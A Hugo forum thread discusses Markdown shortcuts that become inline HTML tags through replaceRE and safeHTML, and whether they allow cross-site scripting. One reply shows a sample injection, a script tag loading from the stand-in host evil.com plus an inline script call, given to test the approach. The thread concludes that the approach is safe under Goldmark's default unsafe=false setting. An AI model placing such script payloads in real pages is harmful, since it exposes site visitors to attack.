Get missing inline HTML tags in Markdown without enabling HTML

Hi,

Goldmark lacks formatting signs for a few inline HTML tags. We can enable HTML to use them in our Markdown, but this is not a good solution, where security should be a concern — e.g. for themes or larger projects with many contributors. The site configuration parameter unsafe should be left in its default state unsafe = false.

In the last few month, I’ve found the following replacements very useful to inject some missing HTML tags after Goldmark has rendered the HTML. So far, there was no interference with other Markdown elements, shortcodes or attributes. The syntax dates back to a suggestion @jmooring made somewhere in this forum.

Every element is surrounded by the curly braces { and }. A special ASCII sign after the first brace indicates the replacement.

  • {^1}<sup>1</sup>
  • {_2}<sub>2</sub>
  • {#Key}<kbd>Key</kbd>
  • {$variable}<var>variable</var>
  • {!highlight}<mark>highlight</mark>
  • {=Author}<cite>Author</cite>
  • {+inserted}<ins>inserted</ins>

These substitutions can be applied with Hugo’s replaceRE. I chained them together in one partial, which is called with .Content as input: {{ partial "content.html" .Content }}.

content.html:

{{
.
| replaceRE `\{\^([^}]*)\}` "<sup>$1</sup>"
| replaceRE `\{\_([^}]*)\}` "<sub>$1</sub>"
| replaceRE `\{\#([^}]*)\}` "<kbd>$1</kbd>"
| replaceRE `\{\!([^}]*)\}` "<mark>$1</mark>"
| replaceRE `\{\=([^}]*)\}` "<cite>$1</cite>"
| replaceRE `\{\+([^}]*)\}` "<ins>$1</ins>"
| replaceRE `\{\$([^}]*)\}` "<var>$1</var>"
| safeHTML }}

Stay safe, :wink:
Georg

P.S.: After @salim pointed out a possible loophole in this approach, I changed the regex patterns to exclude angled brackets.

But this was not necessary, as the clarifying discussion here has shown. So now the template is again as it has been at first, but now I know better how it works.

8 Likes

Handy, thanks for the tip!

By relying on safeHTML like this, you’re essentially “enabling HTML”, I guess:

It should not be used for HTML from a third-party, or HTML with unclosed tags or comments.

I can use your substitution mechanism to insert arbitrary HTML:

{#<script src='https://evil.com'></script><script>nasty();</script>}
1 Like

Wow, thanks, looks like you’re right. This is the opposite of what I did hope to achieve. But these replacements do not work without safeHTML. Maybe we need to enhance the regex to exclude angled brackets. Would that do the trick?

Would that do the trick?

I’m really no expert regarding XSS and stuff.

Generally, you should really know what you’re doing when declaring user input as safeHTML, i.e. sanitize it properly. I don’t know if simply blocking angle brackets is enough… I guess OWASP’s XSS Filter Evasion Cheat Sheet is a good starting point, see e.g. section Character Escape Sequences.

I played around a little more with these regular expressions and noticed something odd. Hugo already seems to filter all tags when evaluating replaceRE.

Did you test your script attack with a recent Hugo version? Because I can’t get a tag through when using my original regex code.

With this in site configuration[1]:

[markup.goldmark.renderer]
unsafe = true

This markdown:

{#<script src='https://evil.com'></script><script>nasty();</script>}

With your original regex code, produces:

<p><kbd><script src='https://evil.com'></script><script>nasty();</script></kbd></p>

With your new regex code, produces:

<p>{#<script src='https://evil.com'></script><script>nasty();</script>}</p>

  1. Never a good idea unless you completely trust content authors. ↩︎

1 Like

Thanks, @jmooring, I haven’t tested this before. These replacements are meant to be used with the default configuration unsafe = false. Maybe the template should check this setting and issue an error or a warning? It wouldn’t make much sense to use these replacements and also allow for raw HTML.

And I have a question now, concerning Hugo’s workflow:
My impression is, Hugo uses its raw HTML check when unsafe = false after all content has been rendered and every replaceRE could have been run. Am I right about this? Then I could remove the check for the angled brackets again and rely on Hugo’s security check. This works on my installation, but I don’t know how far this nice feature dates back.

The unsafe = true/false configuration value sets the value of the yuin/goldmark html.WithUnsafe renderer option. Any manipulation of .Content occurs after goldmark has rendered the markdown to HTML.

1 Like

Thanks again, then the steps are the other way around. With unsafe = false (default) Goldmark omits all HTML tags before replaceRE does its work. And I can rely on that check.

And with unsafe = true an attack doesn’t need replacements to embed script code. They can be placed anywhere like the inline tags. If raw HTML is enabled these replacements are of no use.

2 Likes

Which is why, if a site or theme author is ever tempted to do this…

[markup.goldmark.renderer]
unsafe = true

…they should find another way.

3 Likes

I was following the discussion since I have used the cite option extensively in my pages in the last two days. So, good to know it is all good.

1 Like

This topic was automatically closed 2 days after the last reply. New replies are no longer allowed.